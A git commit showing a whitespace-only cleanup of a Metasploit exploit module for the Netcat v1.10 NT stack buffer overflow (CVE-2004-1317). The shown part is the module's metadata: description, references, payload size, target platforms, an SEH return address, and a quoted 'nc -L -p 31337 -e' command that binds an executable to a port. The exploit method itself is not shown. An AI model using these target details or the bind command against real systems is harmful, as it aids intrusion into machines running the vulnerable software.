clean up whitespace

git-svn-id: file:///home/svn/framework3/trunk@9587 4d416f70-5f16-0410-b530-b9f4589650da
unstable
Joshua Drake 2010-06-22 23:57:05 +00:00
parent 58cbf5d6ad
commit 9d86466285
1 changed files with 19 additions and 19 deletions

View File

@ -21,27 +21,27 @@ class Metasploit3 < Msf::Exploit::Remote
super(update_info(info,
'Name' => 'Netcat v1.10 NT Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending
an overly long string we are able to overwrite SEH. The vulnerability
exists when netcat is used to bind (-e) an executable to a port in doexec.c.
This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
},
'Author' => 'patrick',
This module exploits a stack buffer overflow in Netcat v1.10 NT. By sending
an overly long string we are able to overwrite SEH. The vulnerability
exists when netcat is used to bind (-e) an executable to a port in doexec.c.
This module tested successfully using "c:\>nc -L -p 31337 -e ftp".
},
'Author' => 'patrick',
'Arch' => [ ARCH_X86 ],
'License' => MSF_LICENSE,
'Version' => '$Revision$',
'References' =>
[
[ 'CVE', '2004-1317' ],
[ 'OSVDB', '12612' ],
[ 'BID', '12106' ],
[ 'URL', 'http://www.milw0rm.com/exploits/726' ],
],
[
[ 'CVE', '2004-1317' ],
[ 'OSVDB', '12612' ],
[ 'BID', '12106' ],
[ 'URL', 'http://www.milw0rm.com/exploits/726' ],
],
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 236,
@ -50,10 +50,10 @@ class Metasploit3 < Msf::Exploit::Remote
},
'Platform' => ['win'],
'Targets' =>
[
# Patrick - Tested OK 2007/09/26 w2ksp0, w2ksp4, xpsp2 en.
[ 'Universal nc.exe', { 'Ret' => 0x0040a6ce } ], # p/p/r nc.exe
],
[
# Patrick - Tested OK 2007/09/26 w2ksp0, w2ksp4, xpsp2 en.
[ 'Universal nc.exe', { 'Ret' => 0x0040a6ce } ], # p/p/r nc.exe
],
'DisclosureDate' => 'Dec 27 2004',
'DefaultTarget' => 0))
end